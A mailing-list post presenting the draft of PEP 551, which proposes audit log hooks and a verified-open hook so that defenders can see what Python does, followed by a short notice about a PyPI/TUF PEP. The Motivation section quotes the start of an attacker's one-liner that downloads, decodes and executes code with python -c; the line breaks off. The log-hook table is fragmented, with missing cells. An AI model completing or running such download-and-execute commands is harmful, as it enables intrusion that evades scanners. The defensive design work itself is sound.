Those of you who were at the PyCon US language summit this year (or who
saw the coverage at https://lwn.net/Articles/723823/) may recall that I
talked briefly about the ways Python is used by attackers to gain and/or
retain access to systems on local networks.
This comes out of work we've been doing at Microsoft to balance the
flexibility of scripting languages with their usefulness to malicious
users. PowerShell in particular has had a lot of work done, and we've
been doing the same internally for Python. Things like transcripting
(log every piece of code when it is compiled) and signature validation
(prevent loading unsigned code).
This PEP is about upstreaming enough functionality to make it easier to
maintain these features - it is *not* intended to add specific security
features to the core release. The aim is to be able to use a standard
libpython3.7/python37.dll with a custom python3.7/python.exe that adds
those features (listed in the PEP).
Right now parts of the PEP are incomplete. In particular, the
Recommendations section is much shorter than I intend, the list of log
hook locations is also too short, and I have only done a preliminary
performance analysis. But it's time to get reviews of the overall
concept. I'd also like to take suggestions for more hook locations and
relevant recommendations, so feel free to throw them out there. In
particular, I'm not as up to date on best practices for non-Windows
platforms as the rest of the list, so feel free to correct or improve it.
Because ReST+max 80 character width makes tables completely unreadable
in source, I suggest reading it at
https://github.com/python/peps/blob/master/pep-0551.rst but I've
included the full text below for quoting purposes.
My current implementation is available at
https://github.com/zooba/cpython/tree/sectrans and should work on both
Windows and Linux. I hope to take this to python-dev by next week and
spend the dev sprints getting the PEP to the point where it can be accepted.
Title: Security transparency in the Python runtime
Author: Steve Dower <steve.dower(a)python.org>
Type: Standards Track
This PEP describes additions to the Python API and specific behaviors for the
CPython implementation that make actions taken by the Python runtime visible to
security and auditing tools. The goals in order of increasing importance are to
prevent malicious use of Python, to detect and report on malicious use, and most
importantly to detect attempts to bypass detection. Most of the responsibility
for implementation is required from users, who must customize and build Python
for their own environment.
We propose two small sets of public APIs to enable users to reliably build their
copy of Python without having to modify the core runtime, protecting future
maintainability. We also discuss recommendations for users to help them develop
and configure their copy of Python.
Software vulnerabilities are generally seen as bugs that enable remote or
elevated code execution. However, in our modern connected world, the more
dangerous vulnerabilities are those that enable advanced persistent threats
(APTs). APTs are achieved when an attacker is able to penetrate a network,
establish their software on one or more machines, and over time extract data or
intelligence. Some APTs may make themselves known by maliciously damaging data
or hardware (e.g., Stuxnet).
Most attempt to hide their existence and avoid detection. APTs often use a
combination of traditional vulnerabilities, social engineering, phishing (or
spear-phishing), thorough network analysis, and an understanding of
misconfigured environments to establish themselves and do their work.
The first infected machines may not be the final target and may not require
special privileges. For example, an APT that is established as a
non-administrative user on a developer's machine may have the ability to spread
to production machines through normal deployment channels. It is common for APTs
to persist on as many machines as possible, with sheer weight of presence making
them difficult to remove completely.
Whether an attacker is seeking to cause direct harm or hide their tracks, the
biggest barrier to detection is a lack of insight. System administrators with
large networks rely on distributed logs to understand what their machines are
doing, but logs are often filtered to show only error conditions. APTs that are
attempting to avoid detection will rarely generate errors or abnormal events.
Reviewing normal operation logs involves a significant amount of effort, though
work is underway by a number of companies to enable automatic anomaly detection
within operational logs. The tools preferred by attackers are ones that are
already installed on the target machines, since log messages from these tools
are often expected and ignored in normal use.
At this point, we are not going to spend further time discussing the specifics
of APTs or methods and mitigations that do not apply to this PEP. For further
information about the field, we recommend reading or watching the resources
listed under `Further Reading`_.
Python is a particularly interesting tool for attackers due to its prevalence on
server and developer machines, its ability to execute arbitrary code provided as
data (as opposed to native binaries), and its complete lack of internal logging.
This allows attackers to download, decrypt, and execute malicious code with a
single command::
python -c "import urllib.request, base64;
This command currently bypasses most anti-malware scanners that rely on
recognizable code being read through a network connection or being written to
disk (base64 is often sufficient to bypass these checks). It also bypasses
protections such as file access control lists or permissions (no file access
occurs), approved application lists (assuming Python has been approved for other
uses), and automated auditing or logging (assuming Python is allowed to access
the internet or access another machine on the local network from which the
payload can be obtained).
General consensus among the security community is that totally preventing
attacks is infeasible and defenders should assume that they will often detect
attacks only after they have succeeded. This is known as the "assume breach"
mindset. _ In this scenario, protections such as sandboxing and input
validation have already failed, and the important task is detection, tracking,
and eventual removal of the malicious code. To this end, the primary feature
required from Python is security transparency: the ability to see what
operations the Python runtime is performing that may indicate anomalous or
malicious use. Preventing such use is valuable, but secondary to the need to
know that it is occurring.
To summarise the goals in order of increasing importance:
* preventing malicious use is valuable
* detecting malicious use is important
* detecting attempts to bypass detection is critical
One example of a scripting engine that has addressed these challenges is
PowerShell, which has recently been enhanced towards similar goals of
transparency and prevention. _
Generally, application and system configuration will determine which events
within a scripting engine are worth logging. However, given that the value of
many log events is not recognized until after an attack is detected, it is
important to capture as much as possible and filter views rather than filtering
at the source (see the No Easy Breach video under `Further Reading`_). Events
that are
of interest include attempts to bypass event logging, attempts to load and
execute code that is not correctly signed or access-controlled, use of
operating system functionality such as debugging or inter-process inspection
tools, most network access and DNS resolution, and attempts to create
files or configuration settings on the local machine.
To summarize, defenders have a need to audit specific uses of Python in order to
detect abnormal or malicious usage. Currently, the Python runtime does not
provide any ability to do this, which (anecdotally) has led to organizations
switching to other languages. The aim of this PEP is to enable system
administrators to deploy a security transparent copy of Python that can
integrate with their existing auditing and protection systems.
On Windows, some specific features that may be enabled by this include:
* Script Block Logging _
* DeviceGuard _
* AMSI _
* Persistent Zone Identifiers _
* Event tracing (which includes event forwarding) _
On Linux, some specific features that may be integrated are:
* gnupg _
* sd_journal _
* OpenBSM _
* syslog _
* check execute bit on imported modules
On macOS, some features that may be used with the expanded APIs are:
* OpenBSM _
* syslog _
Overall, the ability to enable these platform-specific features on production
machines is highly appealing to system administrators and will make Python a
more trustworthy dependency for application developers.
Overview of Changes
True security transparency is not fully achievable by Python in isolation. The
runtime can log as many events as it likes, but unless the logs are reviewed and
analyzed there is no value. Python may impose restrictions in the name of
security, but usability may suffer. Different platforms and environments
require different implementations of certain security features, and
organizations with the resources to fully customize their runtime should be
encouraged to do so.
The aim of these changes is to enable system administrators to integrate Python
into their existing security systems, without dictating what those systems look
like or how they should behave. We propose two API changes to enable this: an
Event Log Hook and a Verified Open Hook. Neither is set by default, and both
require modifying the appropriate entry point to enable any functionality. For
the purposes of validation and example, we propose a new spython/spython.exe
entry point program that enables some basic functionality using these hooks.
However, the expectation is that security-conscious organizations will create
their own entry points to meet their needs.
Event Log Hook
In order to achieve security transparency, an API is required to raise messages
from within certain operations. These operations are typically deep within the
Python runtime or standard library, such as dynamic code compilation, module
imports, DNS resolution, or use of certain modules such as ``ctypes``.
The new APIs required for log hooks are::
    # Add a logging hook
    sys.addloghook(hook: Callable[[str, tuple], None]) -> None
    int PySys_AddLogHook(int (*hook)(const char *event, PyObject *args));
    # Raise an event with all logging hooks
    sys.loghook(str, *args) -> None
    int PySys_LogHook(const char *event, PyObject *args);
    # Internal API used during Py_Finalize() - not publicly accessible
Hooks are added by calling ``PySys_AddLogHook()`` from C at any time, including
before ``Py_Initialize()``, or by calling ``sys.addloghook()`` from Python code.
Hooks are never removed or replaced, and existing hooks have an opportunity to
refuse to allow new hooks to be added (adding a logging hook is logged, and so
preexisting hooks can raise an exception to block the new addition).
When events of interest are occurring, code can either call ``PySys_LogHook()``
from C (while the GIL is held) or ``sys.loghook()``. The string argument is the
name of the event, and the tuple contains arguments. A given event name should
have a fixed schema for arguments, and both arguments are considered a public
API (for a given x.y version of Python), and thus should only change between
feature releases with updated documentation.
When an event is logged, each hook is called in the order it was added with the
event name and tuple. If any hook returns with an exception set, later hooks are
ignored and *in general* the Python runtime should terminate. This is
intentional to allow hook implementations to decide how to respond to any
particular event. The typical responses will be to log the event, abort the
operation with an exception, or to immediately terminate the process with an
operating system exit call.
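The ordering and veto rules described above can be sketched in pure Python. This is only an illustration, not the CPython implementation: ``HookRegistry``, ``recorder`` and ``lockdown`` are hypothetical names, and the method names merely mirror the proposed ``sys.addloghook()`` and ``sys.loghook()``.

```python
from typing import Callable, List, Tuple

LogHook = Callable[[str, tuple], None]


class HookRegistry:
    """Toy stand-in for the proposed hook list (hypothetical, for illustration)."""

    def __init__(self) -> None:
        self._hooks: List[LogHook] = []

    def loghook(self, event: str, *args) -> None:
        # Hooks run in the order they were added. The first exception
        # propagates to the caller, so later hooks are skipped.
        for hook in self._hooks:
            hook(event, args)

    def addloghook(self, hook: LogHook) -> None:
        # Adding a hook is itself an event, so existing hooks may veto it
        # by raising before the new hook is stored.
        self.loghook("sys.addloghook")
        self._hooks.append(hook)


seen: List[Tuple[str, tuple]] = []


def recorder(event: str, args: tuple) -> None:
    seen.append((event, args))


def lockdown(event: str, args: tuple) -> None:
    if event == "sys.addloghook":
        raise RuntimeError("adding hooks is not permitted")


registry = HookRegistry()
registry.addloghook(recorder)
registry.addloghook(lockdown)  # recorder sees this event and allows it
registry.loghook("compile", "print('hi')", None)

try:
    registry.addloghook(lambda event, args: None)
    blocked = False
except RuntimeError:
    blocked = True
```

Because ``recorder`` was added first, it still records the rejected attempt before ``lockdown`` raises, which is the behaviour a defender would want from a logging hook placed ahead of a blocking one.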
When an event is logged but no hooks have been set, the ``loghook()`` function
should include minimal overhead. Ideally, each argument is a reference to
existing data rather than a value calculated just for the logging call.
As hooks may be Python objects, they need to be freed during ``Py_Finalize()``.
To do this, we add an internal API ``_Py_ClearLogHooks()`` that releases any
``PyObject*`` hooks that are held, as well as any heap memory used. This is an
internal function with no public export, but it passes an event to all existing
hooks to ensure that unexpected calls are logged.
See `Log Hook Locations`_ for proposed log hook points and schemas, and the
`Recommendations`_ section for discussion on appropriate responses.
Verified Open Hook
Most operating systems have a mechanism to distinguish between files that can be
executed and those that cannot. For example, this may be an execute bit in the
permissions field, or a verified hash of the file contents to detect potential
code tampering. These are an important security mechanism for preventing
execution of data or code that is not approved for a given environment.
Currently, Python has no way to integrate with these when launching scripts or
importing modules.
The new public API for the verified open hook is::
    # Set the handler
    int Py_SetOpenForExecuteHandler(
        PyObject *(*handler)(const char *narrow, const wchar_t *wide))
    # Open a file using the handler
The ``os.open_for_exec()`` function is a drop-in replacement for
``open(pathlike, 'rb')``. Its default behaviour is to open a file for raw,
binary access - any more restrictive behaviour requires the use of a custom
handler. (Aside: since ``importlib`` requires access to this function before the
``os`` module has been imported, it will be available on the lower-level
modules that ``os`` wraps, but the intent is that other users will access it
through the ``os`` module.)
A custom handler may be set by calling ``Py_SetOpenForExecuteHandler()`` from C
at any time, including before ``Py_Initialize()``. When ``open_for_exec()`` is
called with a handler set, the handler will be passed the processed narrow or
wide path, depending on platform, and its return value will be returned
directly. The returned object should be an open file-like object that supports
reading raw bytes. This is explicitly intended to allow a ``BytesIO`` instance
if the open handler has already had to read the file into memory in order to
perform whatever verification is necessary to determine whether the content is
permitted to be executed.
Note that these handlers can import and call the ``_io.open()`` function on
CPython without triggering themselves.
If the handler determines that the file is not suitable for execution, it should
raise an exception of its choice, as well as performing any other logging or
notifications.
All import and execution functionality involving code from a file will be
changed to use ``open_for_exec()`` unconditionally. It is important to note that
calls to ``compile()``, ``exec()`` and ``eval()`` do not go through this
function - a log hook that includes the code from these calls will be added and
is the best opportunity to validate code that is read from the file. Given the
current decoupling between import and execution in Python, most imported code
will go through both ``open_for_exec()`` and the log hook for ``compile``,
so care should be taken to avoid repeating verification steps.
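As a rough illustration of the handler contract described above, the following Python sketch reads a file, checks it against an allow-list of SHA-256 digests, and returns the verified bytes as a ``BytesIO``. The PEP's handler is a C function set with ``Py_SetOpenForExecuteHandler()``; ``verified_open`` and ``APPROVED_DIGESTS`` are hypothetical names used only to show the idea, and a real deployment would use whatever verification its platform provides.

```python
import hashlib
import io
import os
import tempfile

# Hypothetical allow-list mapping absolute paths to expected SHA-256 digests.
APPROVED_DIGESTS = {}


def verified_open(path: str) -> io.BytesIO:
    """Return the file contents as a BytesIO if its digest is approved."""
    with open(path, "rb") as f:
        data = f.read()
    digest = hashlib.sha256(data).hexdigest()
    if APPROVED_DIGESTS.get(os.path.abspath(path)) != digest:
        raise PermissionError(f"{path} is not approved for execution")
    # Hand back the bytes that were verified, not a fresh read of the file,
    # so the content cannot change between the check and its use.
    return io.BytesIO(data)


with tempfile.TemporaryDirectory() as tmp:
    script = os.path.join(tmp, "hello.py")
    original = b"print('hello')\n"
    with open(script, "wb") as f:
        f.write(original)
    APPROVED_DIGESTS[os.path.abspath(script)] = hashlib.sha256(original).hexdigest()

    approved_source = verified_open(script).read()

    # Simulate tampering after approval: the digest no longer matches.
    with open(script, "ab") as f:
        f.write(b"import os\n")
    try:
        verified_open(script)
        tamper_detected = False
    except PermissionError:
        tamper_detected = True
```

Returning the in-memory copy is the reason the text explicitly permits a ``BytesIO`` result.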
While all the functions added here are considered public and stable API, the
behavior of the functions is implementation specific. The descriptions here
refer to the CPython implementation, and while other implementations should
provide the functions, there is no requirement that they behave the same.
For example, ``sys.addloghook()`` and ``sys.loghook()`` should exist but may do
nothing. This allows code to make calls to ``sys.loghook()`` without having to
test for existence, but it should not assume that its call will have any effect.
(Including existence tests in security-critical code allows another vector to
bypass logging, so it is preferable that the function always exist.)
``os.open_for_exec()`` should at a minimum always return
``open(pathlike, 'rb')``. Code using the function should make no further
assumptions about what may occur, and implementations other than CPython are
not required to let developers override the behavior of this function with a
hook.
Log Hook Locations
Calls to ``sys.loghook()`` or ``PySys_LogHook()`` will be added to the following
operations with the schema in Table 1. Unless otherwise specified, the ability
for log hooks to abort any listed operation should be considered part of the
rationale for including the hook.
.. csv-table:: Table 1: Log Hooks
:header: "API Function", "Event Name", "Arguments", "Rationale"
:widths: 2, 2, 3, 6
``PySys_AddLogHook``, ``sys.addloghook``, "", "Detect when new log
``_PySys_ClearLogHooks``, ``sys._clearloghooks``, "", "Notifies
are being cleaned up, mainly in case the event is triggered
This event cannot be aborted."
``Py_SetOpenForExecuteHandler``, ``setopenforexecutehandler``, "",
any attempt to set the ``open_for_execute`` handler."
"``compile``, ``exec``, ``eval``, ``PyAst_CompileString``",
``(code, filename_or_none)``", "Detect dynamic code compilation.
this will also be called for regular imports of source code,
that used ``open_for_exec``."
``import``, ``import``, "``(module, filename, sys.path, sys.meta_path,
sys.path_hooks)``", "Detect when modules are imported. This is
the module name is resolved to a file. All arguments other than the
name may be ``None`` if they are not used or available."
"``_ctypes.dlopen``, ``_ctypes.LoadLibrary``", ``ctypes.dlopen``, "
``(module_or_path,)``", "Detect when native modules are used."
``_ctypes._FuncPtr``, ``ctypes.dlsym``, "``(lib_object, name)``",
information about specific symbols retrieved from native modules."
``_ctypes._CData``, ``ctypes.cdata``, "``(ptr_as_int,)``", "Detect
is accessing arbitrary memory using ``ctypes``"
``id``, ``id``, "``(id_as_int,)``", "Detect when code is accessing
the id of
objects, which in CPython reveals information about memory layout."
``sys._getframe``, ``sys._getframe``, "``(frame_object,)``", "Detect
code is accessing frames directly"
``sys._current_frames``, ``sys._current_frames``, "", "Detect when
accessing frames directly"
``PyEval_SetProfile``, ``sys.setprofile``, "", "Detect when code is
trace functions. Because of the implementation, exceptions raised
hook will abort the operation, but will not be raised in Python
that ``threading.setprofile`` eventually calls this function, so the
will be logged for each thread."
``PyEval_SetTrace``, ``sys.settrace``, "", "Detect when code is
trace functions. Because of the implementation, exceptions raised
hook will abort the operation, but will not be raised in Python
that ``threading.settrace`` eventually calls this function, so the event
will be logged for each thread."
``_PyEval_SetAsyncGenFirstiter``, ``sys.set_async_gen_firstiter``, "", "
Detect changes to async generator hooks."
``_PyEval_SetAsyncGenFinalizer``, ``sys.set_async_gen_finalizer``, "", "
Detect changes to async generator hooks."
``_PyEval_SetCoroutineWrapper``, ``sys.set_coroutine_wrapper``, "",
changes to the coroutine wrapper."
Detect changes to the recursion limit."
", "Detect changes to the switching interval."
"``socket.bind``, ``socket.connect``, ``socket.connect_ex``,
``socket.sendmsg``, ``socket.sendto``", ``socket.address``,
", "Detect access to network resources. The address is unmodified
``socket.__init__``, "socket()", "``(family, type, proto)``", "Detect
creation of sockets. The arguments will be int values."
``socket.gethostname``, ``socket.gethostname``, "", "Detect attempts to
retrieve the current host name."
``socket.sethostname``, ``socket.sethostname``, "``(name,)``", "Detect
attempts to change the current host name. The name argument is
passed as a
"``socket.gethostbyname``, ``socket.gethostbyname_ex``", "
``socket.gethostbyname``", "``(name,)``", "Detect host name
name argument is a str or bytes object."
host resolution. The address argument is a str or bytes object."
``socket.getservbyname``, ``socket.getservbyname``, "``(name,
Detect service resolution. The arguments are str objects."
``socket.getservbyport``, ``socket.getservbyport``, "``(port,
Detect service resolution. The port argument is an int and protocol is a
TODO - more hooks in ``_socket``, ``_ssl``, others?
SPython Entry Point
A new entry point binary will be added, called ``spython.exe`` on Windows and
``spythonX.Y`` on other platforms. This entry point is intended primarily as an
example, as we expect most users of this functionality to implement their own
entry point and hooks (see `Recommendations`_). It will also be used for tests.
Source builds will create ``spython`` by default, but distributors may choose
whether to include ``spython`` in their pre-built packages. The python.org
managed binary distributions will not include ``spython``.
**Do not accept most command-line arguments**
The ``spython`` entry point requires a script file be passed as the first
argument, and does not allow any options. This prevents arbitrary code execution
from in-memory data or non-script files (such as pickles, which can be executed
using ``-m pickle <path>``).
Options ``-B`` (do not write bytecode), ``-E`` (ignore environment variables)
and ``-s`` (no user site) are assumed.
If a file with the same full path as the process with a ``._pth`` suffix
(``spython._pth`` on Windows, ``spythonX.Y._pth`` on Linux) exists, it will be
used to initialize ``sys.path`` following the rules currently described `for
**Log security events to a file**
Before initialization, ``spython`` will set a log hook that writes events to a
local file. By default, this file is the full path of the process with a
``.log`` suffix, but may be overridden with the ``SPYTHONLOG`` environment
variable (despite such overrides being explicitly discouraged in
`Recommendations`_).
The log hook will also abort all ``addloghook`` events, preventing any other
hooks from being added.
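A minimal Python sketch of a hook with this behaviour follows. It is not the ``spython`` implementation (which is set from C before initialization): ``make_file_log_hook`` and the JSON record layout are assumptions made for illustration, and the event name ``sys.addloghook`` is taken from Table 1. The hook writes each record before deciding whether to abort, in line with the advice in `Recommendations`_.

```python
import io
import json
import time
from typing import Callable, TextIO


def make_file_log_hook(log: TextIO) -> Callable[[str, tuple], None]:
    """Build a hook that appends one JSON line per event to ``log``."""

    def hook(event: str, args: tuple) -> None:
        record = {
            "time": time.time(),
            "event": event,
            "args": [repr(a) for a in args],
        }
        # Write and flush first, so the attempt is recorded even if the
        # operation is then aborted.
        log.write(json.dumps(record) + "\n")
        log.flush()
        if event == "sys.addloghook":
            raise RuntimeError("additional log hooks are not permitted")

    return hook


# An in-memory buffer stands in for the log file in this demonstration.
log = io.StringIO()
hook = make_file_log_hook(log)

hook("compile", ("x = 1", "<string>"))
try:
    hook("sys.addloghook", ())
    aborted = False
except RuntimeError:
    aborted = True

events = [json.loads(line)["event"] for line in log.getvalue().splitlines()]
```

In a real entry point the ``log`` argument would be a file opened at a path the process cannot be tricked into changing.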
On Windows, code from ``compile`` events will be submitted to AMSI _ and if it
fails to validate, the compile event will be aborted. This can be tested by
calling ``compile()`` or ``eval()`` on the contents of the `EICAR test file
**Restrict importable modules**
Also before initialization, ``spython`` will set an open-for-execute hook that
validates all files opened with ``os.open_for_exec``. This implementation will
require all files to have a ``.py`` suffix (thereby blocking the use of cached
bytecode), and will raise a custom log message ``spython.open_for_exec``
containing ``(filename, True_if_allowed)``.
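The suffix check and its log message might look roughly like the following in Python. This is a sketch under stated assumptions: the module-level ``loghook`` function is a hypothetical stand-in for the proposed ``sys.loghook()``, and ``spython_open_for_exec`` is an illustrative name rather than the actual C handler.

```python
import os
import tempfile
from typing import List, Tuple

events: List[Tuple[str, tuple]] = []


def loghook(event: str, *args) -> None:
    """Hypothetical stand-in for the proposed sys.loghook()."""
    events.append((event, args))


def spython_open_for_exec(path: str):
    """Open ``path`` for execution only if it has a ``.py`` suffix."""
    allowed = path.endswith(".py")
    # Log the decision before acting on it, so refusals are recorded too.
    loghook("spython.open_for_exec", path, allowed)
    if not allowed:
        raise OSError(f"'{path}' is not permitted to be executed")
    return open(path, "rb")


with tempfile.TemporaryDirectory() as tmp:
    source = os.path.join(tmp, "mod.py")
    cached = os.path.join(tmp, "mod.pyc")
    for name in (source, cached):
        with open(name, "wb") as f:
            f.write(b"pass\n")

    with spython_open_for_exec(source) as f:
        source_bytes = f.read()

    try:
        spython_open_for_exec(cached)
        pyc_blocked = False
    except OSError:
        pyc_blocked = True

outcomes = [args[1] for _, args in events]
```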
On Windows, the hook will also open the file with flags that prevent any other
process from opening it with write access, which allows the hook to perform
additional validation on the contents with confidence that it will not be
modified between the check and use. Compilation will later trigger a ``compile``
event, so there is no need to read the contents now for AMSI, but other
validation mechanisms such as DeviceGuard _ should be performed here.
Full impact analysis still requires investigation. Preliminary testing shows
that calling ``sys.loghook`` with no hooks added does not significantly impact
any existing benchmarks, though targeted microbenchmarks can observe an impact.
Performance impact using ``spython`` or with hooks added is not of interest
here, since this is considered opt-in functionality.
Specific recommendations are difficult to make, as the ideal
configuration for any environment will depend on the user's ability to
manage, monitor, and respond to activity on their own network. However,
many of the proposals here do not appear to be of value without deeper
illustration. This section provides recommendations using the terms
**should** (or **should not**), indicating that we consider it dangerous
to ignore the advice, and **may**, indicating that the advice ought
to be considered for high value systems. The term **sysadmins** refers
to whoever is responsible for deploying Python throughout your network,
though different organizations may have different titles for the
responsible people.
Sysadmins **should** build their own entry point, likely starting from
``spython``, and directly interface with the security systems available
in their environment. The more tightly integrated, the less likely a
vulnerability will be found allowing an attacker to bypass those
systems. In particular, the entry point **should not** obtain any
settings from the current environment, such as environment variables,
unless those settings are otherwise protected from modification.
The default ``python`` entry point **should not** be deployed to
production machines, but could be given to developers to use and test
Python on non-production machines. Sysadmins **may** consider deploying
a less restrictive version of their entry point to developer machines,
since any system connected to your network is a potential target.
Python deployments **should** be made read-only using any available
platform functionality after deployment and during use.
On platforms that support it, sysadmins **should** include signatures
for every file in a Python deployment, ideally verified using a private
certificate. For example, Windows supports embedding signatures in
executable files and using catalogs for others, and can use DeviceGuard
_ to validate signatures either automatically or using an
``open_for_exec`` hook.
Sysadmins **should** collect as many logged events as possible, and
**should** copy them off of local machines frequently. Even if logs are
not being constantly monitored for suspicious activity, once an attack
is detected it is too late to enable logging. Log hooks **should not**
attempt to preemptively filter events, as even benign events are useful
when analyzing the progress of an attack. (Watch the "No Easy Breach"
video under `Further Reading`_ for a deeper look at this side of things.)
Log hooks **should** write events to logs before attempting to abort. As
discussed earlier, it is more important to record malicious actions than
to prevent them. Very few actions should be aborted, as most will occur
during normal use. Sysadmins **may** audit their Python code and abort
operations that are known to never be used deliberately.
On production machines, the first log hook **should** be set in C code
before ``Py_Initialize`` is called, and that hook **should**
unconditionally abort the ``sys.addloghook`` event. The Python interface
is mainly useful for testing.
On production machines, a non-validating ``open_for_exec`` hook **may**
be set in C code before ``Py_Initialize`` is called. This prevents later
code from overriding the hook. However, logging the
``setopenforexecutehandler`` event is still useful, since no code should ever
need to call it. Using at least the sample ``open_for_exec`` hook
implementation from ``spython`` is recommended.
[TODO: more good advice; less bad advice]
**Redefining Malware: When Old Terms Pose New Threats**
By Aviv Raff for SecurityWeek, 29th January 2014
This article, and those linked by it, are high-level summaries of
the rise of
APTs and the differences from "traditional" malware.
**Anatomy of a Cyber Attack**
By FireEye, accessed 23rd August 2017
A summary of the techniques used by APTs, and links to a number of
**Automated Traffic Log Analysis: A Must Have for Advanced Threat
By Aviv Raff for SecurityWeek, 8th May 2014
High-level summary of the value of detailed logging and automatic
**No Easy Breach: Challenges and Lessons Learned from an Epic
Video presented by Matt Dunwoody and Nick Carr for Mandiant at
Detailed walkthrough of the processes and tools used in detecting
**Disrupting Nation State Hackers**
Video presented by Rob Joyce for the NSA at USENIX Enigma 2016
Good security practices, capabilities and recommendations from the
NSA's Tailored Access Operation.
..  Assume Breach Mindset, `<http://asian-power.com/node/11144>`_
..  PowerShell Loves the Blue Team, also known as Scripting Security and
Protection Advances in Windows 10,
..  `<https://aka.ms/deviceguard>`_
..  AMSI,
..  Persistent Zone Identifiers,
..  Event tracing,
..  `<https://www.gnupg.org/>`_
..  `<https://www.systutorials.com/docs/linux/man/3-sd_journal_send/>`_
..  `<http://www.trustedbsd.org/openbsm.html>`_
..  `<https://linux.die.net/man/3/syslog>`_
Thanks to all the people from Microsoft involved in helping make the Python
runtime safer for production use, and especially to James Powell for
of the initial research, analysis and implementation, Lee Holmes for
insights into the info-sec field and PowerShell's responses, and Brett
for the grounding discussions.
Copyright (c) 2017 by Microsoft Corporation. This material may be distributed
only subject to the terms and conditions set forth in the Open Publication
License, v1.0 or later (the latest version is presently available at
This is more of a PyPI security discussion than a core Python issue, but I figured I'd bring attention to it anyway:
The PEP authors are revising the proposed summary, title, etc., per https://github.com/secure-systems-lab/peps/blob/c13384a4fac6822626abb7e09ab… :
> Attacks on software repositories are common, even in organizations with very
good security practices__. The resulting repository compromise allows an
attacker to edit all files stored on the repository and sign these files using
any keys stored on the repository (online keys). In many signing schemes (like
TLS), this access allows the attacker to replace files on the repository and
make it look like these files are coming from PyPI. Without a way to revoke and
replace the trusted private key, it is very challenging to recover from a
repository compromise. In addition to the dangers of repository compromise,
software repositories are vulnerable to an attacker on the network (MITM)
intercepting and changing files. These and other attacks on software
repositories are detailed here__. This PEP aims to protect users of PyPI from
compromises of the integrity, consistency and freshness properties of PyPI
packages, and enhances compromise resilience, by mitigating key risk and
providing mechanisms to recover from a compromise of PyPI or its signing keys.
In addition to protecting direct users of PyPI, this PEP aims to provide similar
protection for users of PyPI mirrors.
> To provide compromise resilient protection of PyPI, this PEP proposes the use of
The Update Framework _ (TUF). .....
> This PEP describes changes to the PyPI infrastructure that are needed to ensure
that users get valid packages from PyPI. ...
> __ https://github.com/theupdateframework/pip/wiki/Attacks-on-software-reposito…
> __ https://theupdateframework.github.io/security.html
Discussion should probably be directed to the Discourse thread at discuss.python.org ; this is just a heads-up.